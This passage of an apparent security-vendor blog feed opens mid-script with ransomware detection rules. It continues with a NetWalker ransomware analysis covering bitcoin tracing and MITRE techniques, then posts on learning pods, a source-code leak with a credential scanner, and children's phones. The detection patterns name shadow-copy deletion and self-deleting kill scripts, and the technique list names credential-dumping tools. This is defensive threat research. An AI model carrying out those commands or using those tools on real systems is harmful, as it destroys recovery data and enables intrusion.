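USER_WRITABLE = re.compile(r'\\(Users|ProgramData|Temp)\\', re.I)


def suspicious_parent(parent_image: str) -> bool:
    return bool(USER_WRITABLE.search(parent_image))


# (technique, rule name, command-line pattern, parent must be user-writable)
RULES = [
    ("T1490", "vssadmin shadow copy deletion",
     re.compile(r'\bvssadmin(\.exe)?\b.*\bdelete\s+shadows\b', re.I), False),
    ("T1070.004", "batch file executed from a temp folder",
     re.compile(r'\bcmd(\.exe)?\b.*\\Temp\\[^\\\s"]+\.bat\b', re.I), True),
    ("T1486", "notepad showing a text file, spawned from a user-writable path",
     re.compile(r'\bnotepad(\.exe)?\b.*\.txt\b', re.I), True),
]


def detect(events):
    """Return (technique, rule name, command line) for every matching event."""
    hits = []
    for ev in events:
        for technique, name, pattern, need_parent in RULES:
            if not pattern.search(ev["cmdline"]):
                continue
            if need_parent and not suspicious_parent(ev["parent_image"]):
                continue
            hits.append((technique, name, ev["cmdline"]))
    return hits


def is_self_delete_batch(text: str) -> bool:
    """True when a batch file both kills a process and deletes itself (del %0)."""
    kills = re.search(r'^\s*taskkill\b', text, re.I | re.M)
    deletes_self = re.search(r'^\s*del\s+"?%0', text, re.I | re.M)
    return bool(kills and deletes_self)


if __name__ == "__main__":
    for hit in detect(SAMPLE_EVENTS):
        print(hit)
    print("self-delete batch:", is_self_delete_batch(SAMPLE_BAT))
```

The shadow copy rule fires regardless of parent because legitimate software rarely deletes all shadow copies; the other two rules are weaker on their own and are gated on the parent process living in a user-writable directory, which is the part of the chain that separates the ransomware from an administrator at a console.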

Decryptor

When a NetWalker victim goes through technical support (see an example of this below) and pays the ransom demanded by the group they will be able to download the decryptor to clean up their environment.

Figure 18. Conversation with NetWalker operators

The download is done directly from the NetWalker Tor site, where the payment page switches to a download page certifying that the payment was made and received:

Figure 19. Decryptor download

The decryptor is delivered in a zip archive containing the decryptor executable and a note explaining how to run the program correctly:

Figure 20. Decryptor delivery

The program launches a graphical interface allowing the user to decrypt their workstation automatically or manually:

Figure 21. Decryptor execution

At the end of the decryption process, the program indicates the number of decrypted files, deletes the ransom note if the user has checked that option, and terminates, leaving the user to resume their work peacefully:

Figure 22. Decryptor has finished the decryption process

The decryptor program appears unique and is linked to one victim specifically. In our example, it only decrypts the files belonging to the victim who made the payment from the user key specified in the ransom note.

Underground Advertising

In March 2020, the moniker Bugatti began actively advertising the NetWalker Ransomware-as-a-Service on two popular underground fora. Bugatti seems to have joined the underground scene in February 2020 but claims to have been active with NetWalker ransomware since September 2019. We have seen NetWalker activity before March but there has been a noticeable uptick in larger victims since their advertisement. For a relatively new ransomware it has been well received and respected among other cybercriminals as compared to, for instance, Nemty ransomware. The strength of NetWalker’s reputation is such that our current hypothesis is that the individual behind Bugatti is most likely a well-respected and experienced cybercriminal, even though it is a new moniker.

Figure 23. Bugatti advertising NetWalker on an underground forum

Bugatti provides regular updates on the improvements in the ransomware, such as the popular Invoke-ReflectivePEInjection method, also commonly used by Sodinokibi. In addition to the improvements in the ransomware, open slots for new affiliates are advertised. Bugatti strongly emphasized that they are primarily looking for experienced affiliates that focus on compromising the complete networks of organizations as opposed to end users. NetWalker is clearly following in the footsteps of its illustrious targeted ransomware peers like Sodinokibi, Maze and Ryuk.

One forum message in particular caught our attention as it included screenshots of several partial bitcoin addresses and USD amounts. This was most likely done to showcase the financial success of the ransomware. We have seen a similar posting in the past with the influential Sodinokibi affiliate Lalartu, so we decided to follow the money once more.

Figure 24. Bugatti is looking for advanced affiliates and shows samples of BTC payments

With the help of CipherTrace software we were able to find the complete BTC addresses from the screenshot and investigate the ledger further:

Screenshot 1

3JHTYZhRmMcq7WCKRzFN98vWvAZk792w9J

Screenshot 2

39aovzbz5rGoQdKjDm6JiybkSu1uGdVJ2V

Screenshot 3

39NRnZtgACDVhhmc7RwmvH9ZDUKTNwwaeB

Screenshot 4

3L4AW5kHnUCZBBjg2j1LBFCUN1RsHPLxCs

Following the Money

In the transactions mentioned in the underground forum post, the ransom amount paid by the victims is presumably shown. Since the bitcoin blockchain is a publicly accessible ledger, we can follow the money and see where the ransomware actors transfer it. In the case of the four posted transactions above, the full amount paid by the victim was transferred to two addresses (beginning with bc1q98 and 1DgLhG respectively). It is safe to say that these two bitcoin addresses are under the control of the NetWalker actors. We then analyzed all incoming transactions to these two addresses and made the following observations:

  • The first incoming transaction occurs on 1 March 2020.
  • On 30 March 2020 the first incoming transaction appears where the amount is split between 4 different bitcoin addresses. A split like this is typically seen in Ransomware-as-a-Service, where the ransom payment is split between the RaaS operators and the affiliate who caused the infection. In this first transaction, the split is 80%, 10% and two 5% portions. This split matches the advertisement on the underground forum (80% – 20%).
  • The two 5% portions of the ransom payments that are split, seem to be consistently transferred to the two bitcoin addresses we revealed earlier (bc1q98 and 1DgLhG).
  • While the beneficiaries of the 5% cuts remain the same, the beneficiary of the 10% cut seems to change over time. Based on the forum post we assume these addresses also belong to the NetWalker actors.
  • Payments to the bc1q98 and 1DgLhG addresses that are not split continue until the end of May. Possibly the initial NetWalker operators added a RaaS operation while continuing to cause NetWalker infections themselves.
  • While analyzing the bitcoin addresses that received 80% or more of the transaction amount, we noticed that some addresses receive payments multiple times. A possible explanation is that such an address is configured as the payout address for a certain campaign or affiliate. We identified 30 unique bitcoin addresses that seem to be the beneficiary of this larger portion of the ransom transaction. Some of these only received one payment, but several received multiple payments.
  • The two addresses uncovered by tracing the transactions held a total of 641 bitcoin on 27 July 2020, which at the current market value of bitcoin is worth well over 7 million USD.

Amounts Extorted

Working under the hypothesis that all the incoming transactions are ransomware payments; we can make the following observations:

  • We found 23 transactions where the ransom payments were not split up and the beneficiaries are the two bitcoin addresses found by following the transactions mentioned in the underground forum post. The total amount of bitcoin extorted this way between 1 March 2020 and 27 July 2020 is 677 BTC. Additionally, the amount received from remaining transactions following the Ransomware-as-a-Service scheme by these addresses between 1 March 2020 and 27 July 2020 is 188 BTC.
  • In the transactions that are split, the largest amount (usually 80% to 90% of the total transaction value) is presumably transferred to the affiliate that caused the infection. When we summed up these largest portions, we saw a total of 1723 BTC being transferred to affiliates.
  • The total amount of extorted bitcoin that has been uncovered by tracing transactions to these NetWalker related addresses is 2795 BTC between 1 March 2020 and 27 July 2020. By using historic bitcoin to USD exchange rates, we estimate a total of 25 million USD was extorted with these NetWalker related transactions.
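The classification used in the two lists above (an unsplit payment straight to an operator address versus an 80/10/5/5 RaaS split, with the largest output attributed to the affiliate) is mechanical enough to script. The following is an added example for this page, not the tooling used by McAfee or CipherTrace: it classifies constructed transactions, computes the shares and sums BTC per role. The two actor addresses are stand-ins for the truncated bc1q98 and 1DgLhG addresses, and all amounts and affiliate addresses are invented to reproduce the shapes described in the text.

```python
from decimal import Decimal

# Stand-ins for the two actor addresses (the write-up only gives their
# prefixes, bc1q98 and 1DgLhG); a real analysis uses the full addresses.
OPERATOR_ADDRESSES = {"OPERATOR_bc1q98", "OPERATOR_1DgLhG"}

# Constructed transactions: (txid, [(output address, BTC amount), ...]).
SAMPLE_TXS = [
    ("tx1", [("OPERATOR_bc1q98", Decimal("10"))]),                    # unsplit payment
    ("tx2", [("AFFILIATE_1", Decimal("16")), ("TENPCT_1", Decimal("2")),
             ("OPERATOR_bc1q98", Decimal("1")), ("OPERATOR_1DgLhG", Decimal("1"))]),
    ("tx3", [("AFFILIATE_2", Decimal("4")), ("TENPCT_2", Decimal("0.5")),
             ("OPERATOR_bc1q98", Decimal("0.25")), ("OPERATOR_1DgLhG", Decimal("0.25"))]),
    ("tx4", [("AFFILIATE_1", Decimal("8")), ("TENPCT_2", Decimal("1")),
             ("OPERATOR_bc1q98", Decimal("0.5")), ("OPERATOR_1DgLhG", Decimal("0.5"))]),
    ("tx5", [("SOMEONE_ELSE", Decimal("3"))]),                        # not NetWalker-related
]


def classify(outputs, operators):
    """'direct' if every output goes to a known operator address, 'raas_split'
    if operators receive a minority cut beside a larger payout, else 'unrelated'."""
    to_ops = [amt for addr, amt in outputs if addr in operators]
    if not to_ops:
        return "unrelated"
    if len(to_ops) == len(outputs):
        return "direct"
    return "raas_split"


def split_shares(outputs):
    """Percentage of the transaction value received by each output address."""
    total = sum(amt for _, amt in outputs)
    return {addr: (amt / total * 100).quantize(Decimal("0.1")) for addr, amt in outputs}


def summarize(txs, operators):
    """BTC totals per role, plus payout addresses that were paid more than once."""
    direct = affiliate = operator_cut = operator_two = Decimal(0)
    payouts = {}
    for _, outputs in txs:
        kind = classify(outputs, operators)
        if kind == "unrelated":
            continue
        if kind == "direct":
            direct += sum(amt for _, amt in outputs)
            continue
        # Largest output is attributed to the affiliate; the rest is the
        # operators' cut, of which the part to the two known addresses is
        # tracked separately (the "remaining transactions" figure in the text).
        largest_addr, largest_amt = max(outputs, key=lambda o: o[1])
        affiliate += largest_amt
        payouts[largest_addr] = payouts.get(largest_addr, 0) + 1
        for addr, amt in outputs:
            if addr == largest_addr:
                continue
            operator_cut += amt
            if addr in operators:
                operator_two += amt
    return {
        "direct_btc": direct,
        "affiliate_btc": affiliate,
        "operator_cut_btc": operator_cut,
        "operator_two_addr_cut_btc": operator_two,
        "total_btc": direct + affiliate + operator_cut,
        "repeat_payout_addresses": sorted(a for a, n in payouts.items() if n > 1),
    }


if __name__ == "__main__":
    for txid, outputs in SAMPLE_TXS:
        print(txid, classify(outputs, OPERATOR_ADDRESSES), split_shares(outputs))
    print(summarize(SAMPLE_TXS, OPERATOR_ADDRESSES))
```

Decimal is used rather than float so that satoshi-level amounts add up exactly; with real ledger data the same summary would be fed a USD rate per transaction date to reproduce the historic-rate estimate in the text.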

Even though we do not have complete visibility into the BTC flow before NetWalker started ramping up, one thing is certain, this quarter alone it has been highly successful at extorting organisations for large amounts of money. All this at a time when many sectors are struggling because people are sheltering in place and governments are trying to keep businesses from going bankrupt. NetWalker is making millions off the backs of legitimate companies.

Figure 25. Overview of uncovered bitcoin transactions, highlighting the two identified actor addresses.

Observed Changes

While talking about the impact of NetWalker with our partners, we learned that the change in modus operandi not only affected the way the actors communicate with their victims. When there was a change from email communication to a dedicated Tor hidden service, the actors also moved away from using legacy bitcoin addresses to SegWit addresses. The benefits of using the newer SegWit addresses include faster transaction time and lower transaction cost. The NetWalker advertisement on the underground forum mentions instant and fully automatic payments around the time of this observed change. This makes us believe the ransomware actors were professionalizing their operation just before expanding to the Ransomware-as-a-Service model.

Comparison with Previous Ransomware

Given the sudden appearance of NetWalker ransomware and the associated threat actor, we suspected that some prior knowledge of ransomware development or an existing underground presence had to be in place. Armed with this hypothesis, we searched for possible links to underground actors and other ransomware strains that might fit the bill. We came across one threat actor offering ransomware that caught our attention. It was the use of the name NetWalker, in combination with a strong ransomware connection, that sparked our interest.

Some years ago, a threat actor using the moniker Eriknetwalker was advertising ransomware on several underground forums. We found posts from 2016 and the latest public activity was around June 2019, several months before NetWalker ransomware made its appearance.

Figure 26. Eriknetwalker began advertising their ransomware in 2016 (Google-translated from Russian)

Based on our underground research, we linked the moniker Eriknetwalker to the development and/or distribution of Amnesia, Bomber and Scarab ransomware. Eriknetwalker stopped advertising ransomware around June 2019. Therefore, we decided to perform a comparative analysis between the different ransomware strains linked to Eriknetwalker and some of the earliest versions of NetWalker we could find.

The goal of this comparative analysis was to identify whether there was an overlap between source codes. Such overlap could suggest a stronger link between the current NetWalker version and the other ransomware versions from Eriknetwalker, possibly even explaining the name overlap.

To execute the analysis, we used several tools one of which was the binary visualization tool Veles, which dynamically translates binary information into an abstract visualization that allows us to identify and compare patterns.

The different types of ransomware we began analyzing were the variants of Amnesia, Scarab, and NetWalker.

Figure 27. Flat visualization of binary data of the different ransomware variants

Figure 28. 3D visualization of binary data of the different ransomware variants

Visualizing data in such a manner is a way to use the human brain to quickly identify patterns and be able to draw comparisons between objects. In our case, we see that, based on the binary data visualized in Figures 27 and 28, the ransomware binaries do yield differences that we cannot ignore.

Figure 29. Comparison of source code results

Figure 29 shows the results of a source code similarity analysis run on the different ransomware variants named in the figure. Interestingly enough, Scarab and Amnesia show a higher overlap with Buran and Zeppelin than with the early NetWalker samples. The percentages shown are the amount of code that is similar between two variants.

As illustrated in the overview, the September 2019 NetWalker version has a different codebase from the Eriknetwalker-linked ransomware variants. This finding disproves our earlier hypothesis that NetWalker is linked to the older Amnesia variants based on code overlap.

Often, research teams do not publish their results when it disproves their own hypothesis. However, for the sake of transparency, we decided to include our research efforts.

YARA Rules

We uploaded a YARA rule to detect almost all the samples observed in the wild to date.

Indicators of Compromise

During our investigation we have observed numerous IoCs linked to NetWalker ransomware. To obtain them please visit our McAfee ATR GitHub site, or get the latest NetWalker IoCs and intelligence on many other threats with McAfee Insights.

MITRE ATT&CK Techniques

The below techniques were based on our research and complemented with research from industry peers.

  • Initial Access
    • Exploit Public-Facing Application (T1190) : Exploit Tomcat, Exploit WebLogic
    • Spear phishing Attachment (T1566.001): Phishing email
    • Valid Accounts (T1078): RDP compromised
  • Execution
    • PowerShell (T1059.001): PowerShell Script
    • Command and Scripting Interpreter: Windows Command Shell (T1059.003)
    • Service Execution (T1569.002): PsExec
    • Native API (T1106): Use Windows API functions to inject DLL
    • Windows Management Instrumentation (T1047)
  • Persistence
    • Registry Run Key (T1547.001): Place a value on RunOnce key
    • Modify Registry (T1112): Create its own registry key in \SOFTWARE\<uniquename>
  • Privilege Escalation
    • Exploitation for Privilege Escalation (T1068): CVE-2020-0796, CVE-2019-1458, CVE-2017-0213, CVE-2015-1701
    • Process Injection (T1055.001): Reflective DLL Injection
  • Defense Evasion
    • Disabling Security Tools (T1562.001): ESET AV Remover, Trend Micro’s Security Agent Uninstall Tool, Microsoft Security Client Uninstall
    • Process Injection (T1055.001): Reflective DLL Injection
    • Deobfuscate/Decode Files or Information (T1140)
    • Obfuscated Files or Information (T1027): PowerShell Script uses Base64 and hexadecimal encoding and XOR-encryption
  • Credential Access
    • Credential Dumping (T1003): Mimikatz, Mimidogz, Mimikittenz, Windows Credentials Editor, Pwdump, LaZagne
    • Brute Force (T1110.001): NLBrute
  • Discovery
    • Network Service Scanning (T1046): SoftPerfect Network Scanner
    • Security Software Discovery (T1518.001)
    • System Information Discovery (T1082)
  • Lateral Movement
    • Third-Party Software (T1072): TeamViewer, Anydesk
    • Service Execution (T1569.002): PsExec
    • Lateral Tool Transfer (T1570)
  • Collection
    • Data from information repositories (T1213)
    • Data from local system (T1005)
    • Data from network shared drive (T1039)
  • Command and Control
    • Ingress Tool Transfer (T1105)
  • Impact
    • Data Encrypted (T1486): NetWalker Ransomware
    • Inhibit System Recovery (T1490): Shadow Copies Deleted
    • Service Stop (T1489)

Conclusion

Ransomware has evolved into a lucrative business for threat actors: underground forums sell ransomware, and support portals guide victims through acquiring cryptocurrency for payment and through the negotiation of the ransom. McAfee's Advanced Threat Research team has analysed the NetWalker ransomware and has been following its evolution from the initial sighting of the Mailto ransomware to its redevelopment into NetWalker. The recent shift to a business-centric Ransomware-as-a-Service model is a clear sign that the operation is stepping up, and the NetWalker group appears to be following in the footsteps of REvil and other successful RaaS groups. The ransomware developers have shown the ability to refocus and capitalize on current world events, developing lures that help ensure the effectiveness of the ransomware, and have become selective about their affiliates by limiting access to the ransomware to those with vetted access to large organizations. As development of the ransomware continues, we have witnessed recent shifts in activity that closely follow other ransomware developments, including threatening victims with the release of confidential information if the ransom is not paid.

McAfee ATR is actively monitoring ransomware threats and will continue to update McAfee MVISION Insights and its social networking channels with new and current information. MVISION Insights is the only proactive endpoint security solution that simultaneously prioritizes and predicts threats that matter to our customers while offering prescriptive guidance on what to do in their local environment. Want to stay ahead of the adversaries? Check out McAfee MVISION Insights for more information. If you want to experience some of the MVISION Insights capabilities, go the Preview of MVISION Insights where you can select the top threat information that is available.

Authored by: Thibault Seret, Valentine Mairet, Jeffrey Sman, Alfred Alvarado, Tim Hux, Alexandre Mundo, John Fokker, Marc Rivero Lopez and Thomas Roccia.

The post Take a “NetWalk” on the Wild Side appeared first on McAfee Blogs.

How to Keep Remote Learning Pod Students Safe Online
https://www.mcafee.com/blogs/consumer/family-safety/how-to-keep-remote-learning-pod-students-safe-online/
Sat, 01 Aug 2020 16:39:41 +0000

The upheaval of 2020 has forced us all to reimagine familiar pathways, and parents are no exception. Cautious about sending their kids back into the classroom, families across the country are banding together to form remote “learning pods.”

Learning pods are small groups of families with like-aged children that agree to educate their kids together. Parents also refer to learning pods as micro-schools, pandemic pods, and bubbles. According to parents, a pod environment will allow students to learn in a structured setting and safely connect with peers, which will also be a boost to their mental health following months of isolation.

According to media reports, each pod’s structure is different and designed to echo the unique distance learning challenges of each family. In some pods, parents will determine the curriculum. In others, a teacher or tutor will. As well, parents have set some pods up so they can take turns teaching and working. Some will have a cost attached to cover teacher fees and materials. Working parents are also creating “nanny share” pods for pre-school aged children.

Social Networking

Facebook is the place to connect for families seeking pod learning options. There are now dozens of private Facebook “pod” groups that enable parents to connect with one another and with teachers who have also opted out of returning to the classroom.

While parents may structure pods differently, each will need to adopt standard digital security practices to protect students and teachers who may share online resources. If pod learning is in your family’s future, here are a few safeguards to discuss before the pod-based school year begins.

Digital Safety & Learning Pods

Be on the lookout for malware. Malware attempts, since COVID, continue to rise. Pod learners may use email, web-based collaboration tools, and outside home networks more, which can expose them to malware risks. Advise kids never to click unsolicited links contained in emails, texts, direct messages, or pop-up screens. Even if they know the sender, coach them to scrutinize the email or text. To help protect your child’s devices against malware, phishing attacks, and other threats while pod learning, consider updating your security solutions across all devices.

Use strong passwords. Back-to-school is a great time to review what makes a strong password. Opt for two-factor authentication to add another layer of protection between you and a potential attacker.

Consider a VPN. Your home network may be safe, but you can't assume other families follow the same protocols. Cover your bases with a VPN. A virtual private network (VPN) encrypts your child's traffic between the device and the VPN service, so it stays protected on networks you do not control.

Filter and track digital activity. One digital safeguard schools usually have that a home environment may not is a firewall. Schools erect firewalls to keep kids from accessing social networks and gaming sites during school hours. For this reason, families opting for pod learning might consider parental controls. Parental controls allow families to filter or block web content, log daily web activity, set time limits, and track location.

Learning pods are still taking shape at the grassroots level, and there are still a lot of unknowns. Still, one thing is clear: Remote education options also carry an inherent responsibility to keep students safe and secure while learning online.

The post How to Keep Remote Learning Pod Students Safe Online  appeared first on McAfee Blogs.

Source Code Leak – What We Learned and How You Can Protect Your IP
https://www.mcafee.com/blogs/enterprise/cloud-security/source-code-leak-what-we-learned-and-how-you-can-protect-your-ip/
Fri, 31 Jul 2020 16:05:48 +0000

This week we learned about a leak of source code from 50 prominent companies, posted by a Swiss IT consultant. These come after another recent leak of source code from Nintendo, prompting us to comment on the issue of IP protection and secure development pipelines.  

The latest leak appears to stem primarily from a misconfiguration of SonarQube, an open-source tool for static code analysis, which allows developers to audit their code for bugs and vulnerabilities prior to deployment.  

Our own assessment found that SonarQube's web interface listens on TCP port 9000 by default. At the affected companies that port was likely left open to the internet, allowing researchers to gain access and discover the data now exposed in the leak.

A search for SonarQube on the popular IoT search engine Shodan lets anyone find internet-exposed instances of common software such as this. With that information so easily available, ports unintentionally left open invite a wide swath of intrusion attempts.

Several of the source code repositories also contained hard-coded credentials, which open the door to accessing other resources and expansion of the breach. It is a best practice to never commit code with hard-coded/plaintext credentials to your repositories.   

How You Can Protect Your IP  

Mistakes like misconfiguration and accidental credential exposure will happen in the development process, which is where InfoSec teams need to step in. Auditing infrastructure code both prior to deployment and continuously in production is essential for companies practicing DevOps and CI/CD.  

Our solution to this problem is MVISION Cloud, the multi-cloud security platform for enterprises to protect their data, prevent threats, and maintain secure deployments for their cloud-native apps.  

Audit Cloud Accounts for Misconfiguration 

With MVISION Cloud InfoSec teams can monitor their company’s public cloud accounts, like AWS, Azure, or GCP, for configuration mistakes that may expose sensitive data. In the example below, MVISION Cloud discovered that a resource in AWS EC2 was configured with Unrestricted Access to ports other than 80/443, opening up potential breach scenarios like we saw with the source code leak.  

Scan Application Code for Vulnerabilities  

Companies with active container deployments should take this one step further, auditing not only for misconfigurations but also CVEs in their container images. In the example below, MVISION Cloud discovered that one container image contained 219 code vulnerabilities, many of which could be exploited in an attack.  

Scan Repositories for Hard-Coded Credentials and Secret Keys 

To mitigate the risk of credential or secret key exposure, within MVISION Cloud you can easily scan your repositories for specific data types and take multiple levels of action. Below we’ve set up a policy to scan Bitbucket and Github with our Data Loss Prevention (DLP) data identifiers for AWS Keys and Passwords. With Passwords, we are using keyword validation, meaning we will only trigger an incident if a keyword like pwd, p, or password is nearby. We’ve chosen the least disruptive action here – notifying the end user to remediate themselves, however the option to delete the data is also available.   
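A minimal version of that repository scan, as an added example rather than MVISION Cloud's own logic, covering both the hard-coded credential problem noted above and the two data identifiers just described: an AWS access key ID pattern and a password pattern that only raises an incident when a keyword such as pwd or password sits near the value. The file suffix list, the keyword list, the 40-character window and the sample config are assumptions of this example.

```python
"""Repository scan for hard-coded AWS keys and keyword-validated passwords.

Added example, not McAfee's or MVISION Cloud's code. The suffix list,
keyword list and window size are assumptions made for this illustration.
"""
import re
import sys
from dataclasses import dataclass
from pathlib import Path
from typing import Iterator, List

# AWS access key IDs are 20 characters: a 4-letter prefix (AKIA for long-lived
# keys, ASIA for temporary ones) followed by 16 upper-case letters or digits.
AWS_ACCESS_KEY_RE = re.compile(r"\b(?:AKIA|ASIA)[A-Z0-9]{16}\b")

# Candidate password values: anything assigned with '=' or ':' that is at
# least 8 non-blank characters, with optional surrounding quotes.
PASSWORD_VALUE_RE = re.compile(r"""[=:]\s*["']?([^\s"']{8,})["']?""")

# Keyword validation: a candidate only becomes an incident when one of these
# appears in the text just before it. A one-letter keyword such as "p" is
# left out here because a substring match on it would fire on almost every line.
PASSWORD_KEYWORDS = ("pwd", "passwd", "password", "secret")
KEYWORD_WINDOW = 40  # characters before the value searched for a keyword (assumed)

SCAN_SUFFIXES = (".py", ".env", ".yml", ".yaml", ".json", ".cfg", ".ini", ".sh", ".txt")


@dataclass
class Finding:
    path: str
    line_no: int
    kind: str      # "aws_access_key" or "password"
    snippet: str   # redacted value, safe to include in a notification


def redact(value: str) -> str:
    """Keep a short prefix so the owner can recognise the secret without re-exposing it."""
    if len(value) <= 4:
        return "*" * len(value)
    return value[:4] + "*" * (len(value) - 4)


def scan_line(path: str, line_no: int, line: str) -> Iterator[Finding]:
    """Apply both identifiers to one line of text."""
    for m in AWS_ACCESS_KEY_RE.finditer(line):
        yield Finding(path, line_no, "aws_access_key", redact(m.group(0)))
    for m in PASSWORD_VALUE_RE.finditer(line):
        # Only the text immediately before the value is checked for a keyword.
        context = line[max(0, m.start() - KEYWORD_WINDOW):m.start()].lower()
        if any(keyword in context for keyword in PASSWORD_KEYWORDS):
            yield Finding(path, line_no, "password", redact(m.group(1)))


def scan_text(path: str, text: str) -> List[Finding]:
    """Scan a whole file body; line numbers are 1-based."""
    return [f for n, line in enumerate(text.splitlines(), 1)
            for f in scan_line(path, n, line)]


def scan_repo(root: Path) -> List[Finding]:
    """Walk a checked-out repository, skipping the .git directory."""
    findings: List[Finding] = []
    for p in root.rglob("*"):
        if ".git" in p.parts or not p.is_file() or p.suffix not in SCAN_SUFFIXES:
            continue
        try:
            findings.extend(scan_text(str(p), p.read_text(errors="ignore")))
        except OSError:
            continue
    return findings


def remediation_notice(findings: List[Finding]) -> str:
    """The least disruptive action: a message asking the committer to remediate."""
    lines = [f"{f.path}:{f.line_no}: {f.kind} -> {f.snippet}" for f in findings]
    return "Hard-coded credentials found; please rotate and remove them:\n" + "\n".join(lines)


# Constructed sample file (not a real repository). The access key pair is the
# placeholder AWS uses in its own documentation, not a live credential.
SAMPLE_CONFIG = """\
# build job settings
aws_access_key_id = AKIAIOSFODNN7EXAMPLE
aws_secret_access_key = wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY
db_password = "Sup3rS3cretValue"
timeout = 30
username = "deploy-bot-account"
"""

if __name__ == "__main__":
    target = Path(sys.argv[1]) if len(sys.argv) > 1 else None
    found = scan_repo(target) if target else scan_text("sample.ini", SAMPLE_CONFIG)
    print(remediation_notice(found) if found else "No hard-coded credentials found.")
```

Run with a repository path to scan a checkout, or with no arguments to see the three incidents the sample raises; note that the `username` line is skipped because no keyword precedes it, which is exactly what keyword validation buys over a bare value pattern.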

The speed of DevOps is allowing companies to innovate quickly, but without security audits built into the pipeline, misconfigurations and vulnerable code can go unnoticed and expose data in a breach. We strongly encourage the movement from DevOps to DevSecOps, building this audit process into the standard practice of application development. 

For more on how MVISION Cloud can enable you to implement a DevSecOps practice, get in touch with us today.  

Smartphone Alternatives for Free-Ranging Kids https://www.mcafee.com/blogs/consumer/smartphone-alternatives-for-free-ranging-kids/ Thu, 30 Jul 2020 22:34:36 +0000


A popular topic in our blogs is “when to buy a child a smartphone,” and for good reason. It’s an important conversation, one that calls for plenty of research and reflection as you look to balance the risks and rewards of giving your child a smartphone. Maybe you’ve already arrived at your answer and decided that your child isn’t ready—yet you still like the idea of using technology to keep in touch with your kiddo. If so, you still have options.

Why is smartphone ownership for children on the rise?

And that’s the thing. We want to keep in touch with our kids. We’ve seen studies and heard anecdotal references time and time again: one of the top reasons parents give a child a smartphone is “to stay in touch.” Whatever the reason parents cite, smartphone ownership by young users is on the rise. According to recent research from Common Sense Media, 19% of eight-year-olds in the U.S. owned a smartphone in 2019, compared to just 11% in 2015. (Nearly double!) Looking at older tweens, 69% of twelve-year-olds owned one, whereas that number was just 41% in 2015.

As these numbers rise, it raises some questions about how families can benefit from giving a smartphone to a child, particularly a younger one. One thought that quickly comes to mind is that families have a lot to juggle with jobs, school, activities, play dates, and so forth all in the mix. Smartphones help us keep on top of it all. With texting, calls, calendars, and GPS, a smartphone seems to offer some easy answers when it comes to keeping organized and on schedule. Likewise, the reality is that we have households where parents work multiple jobs or keep hours that go outside the regular 9-to-5, which makes staying connected that much more important, to the degree that it’s a near necessity.

Another thought around the rise of young smartphone owners is around a desire to help our kids become more independent, or at least semi-independent with some supervision. Maybe that’s letting them walk to school or a friend’s house, all with the reassurance that you can track where they are with GPS and feel good knowing they can get in touch with you quickly if they need to (and vice-versa). 

Free-Range Parenting and Smartphone Technology

Taking that approach a step further is the re-invigorated notion of “free-range parenting,” which harkens back to the days of the 70’s, 80’s and even earlier when kids were simply sent out of the house to go roam around the neighborhood and playgrounds with friends until suppertime. The pros and cons of allowing your child to explore their world more freely and to do so with less direct supervision are a conversation unto themselves. Local laws vary, as do family situations, not to mention a child’s age and overall level of preparedness. So while free-range parenting is a snappy phrase, it’s a rather complex topic. I don’t bring it up glibly. Yet, it’s a conversation that’s been making the rounds in parenting blogs in recent years. Now, with how pervasive smartphone ownership has become, the conversation gets that much more interesting. But is a smartphone really the best tool here?

The flipside is that a smartphone, for all its benefits, like instant messaging, texting, location tracking, family calendars, and good old phone calls, obviously has its drawbacks when it’s in the hands of young kids. A smartphone is an open door to the broader internet—social media, games, endless hours of videos, not to mention content that you know is not appropriate for them. It’s a world that no child should be thrown into cold. Just like learning to walk, it should be entered gradually, in baby steps.

Stay in Touch without the Smartphone

And thankfully there are devices that are built just for that, while still giving families the means “to stay in touch” without introducing the risks of the internet to young children at too young an age. In short, you don’t need a smartphone to get all the benefits of a smartphone, at least when it comes to keeping tabs on your children.

What follows are a few options you can check out and research for yourself. Know that I’m not personally endorsing or recommending any particular brand, device, or phone here. My aim is to give you a nudge into an initial direction with a quick overview of what’s out there so that you can make a choice that works great for your family. Let’s take a look:

Flip Phones

The trusty flip phone. Rugged. Low-cost. Long battery life. Together, that makes them a fine option for kids. The options for them are quite broad, where you can get phones that are essentially just phones and nothing else, to other models that include cameras, push-to-talk walkie-talkie communications, and slide-out keyboards for texting. Doing a little research online will turn up numerous lists of the “best” flip phones and give you a strong idea of which one has the features you want (and don’t want) for your child.

Cellular and Wi-Fi Walkie-Talkies

An interesting and relatively recent entry into the “just for kids” phone market is the relay phone. In actuality, the relay looks more like a small speaker that’s the size of a standard sticky note and the width of an ice cream sandwich, which is quite practical. Kids can clip it on to their backpack, pop it in their pocket, or wear it on an armband. With a big button in the center, it gives kids a screen-free, push-to-talk phone that works with cellular and Wi-Fi networks. The other great feature for parents and their free-ranging kids is the combination of GPS tracking and geofencing. This way, you can always know where your children are and get alerts if they stray from the geofenced area you prescribe (like a few blocks around your home or a route to and from school). Additionally, it includes SOS emergency alerts, where five quick taps of the button will send an instant notification.

Smart Watches for Kids

Similar to the above, the U.S. mobile carrier Verizon offers a smart watch for children called the GizmoWatch2. At first glance, it looks like many other smart watches on the market but with a twist: you can load it with up to 10 contacts that you approve, so your child can text or call them with the push of a button. And like the relay phone, it also has GPS technology that allows you to instantly locate your child and get alerts when they step outside of their geofenced area. Other features include a step counter, tasks and reminders, plus a calendar function for setting a schedule. And yes, it’s a watch too. Pretty convenient, as it’s simply something that your child can wear.

For families in the EU, XPLORA offers a range of smart watches for kids that are currently available for online shopping in the UK, Germany, Spain, France and Poland, and in selected retail stores. Another option for UK families is the Vodafone V-Kids Watch, which offers GPS tracking, voice messaging, and an SOS button as well.

First Phones for Kids

On the more fully featured side, Gabb Wireless offers a phone and network made for young users. The look and feel of this device is more like a smartphone, yet the functionality and apps are narrowed down to the basics. It includes messaging, a camera, and things like a calculator, voice recorder, and calendar. What’s missing are social media apps, games, and internet browsing (and everything that comes with that). It’s available in the lower 48 states of the U.S. (for now).

Giving Your Child an “Old” Smartphone

One option for parents is to give a child an old smartphone, say a phone that might be otherwise destined for a swap at the mobile phone shop, and to “dumb it down” by removing everything but the most essential of apps. However, as you are certainly aware, kids are smart. And curious. Count on them figuring out how to make that dumb phone smart again by reloading apps on their own. One more thing to keep in mind is that your old data and passwords may be on this phone, so you’d want to reset your phone completely, like back to the original factory settings, to avoid any access or data issues. You’d also want to pick up antivirus for your iOS or Android phone and apply some parental controls to it as well. 

So while this route may feel like you’re getting some extra mileage out of a phone and giving your child the means to stay in touch, know that it comes with those risks. With that, I don’t recommend this for the younger ones in your life.

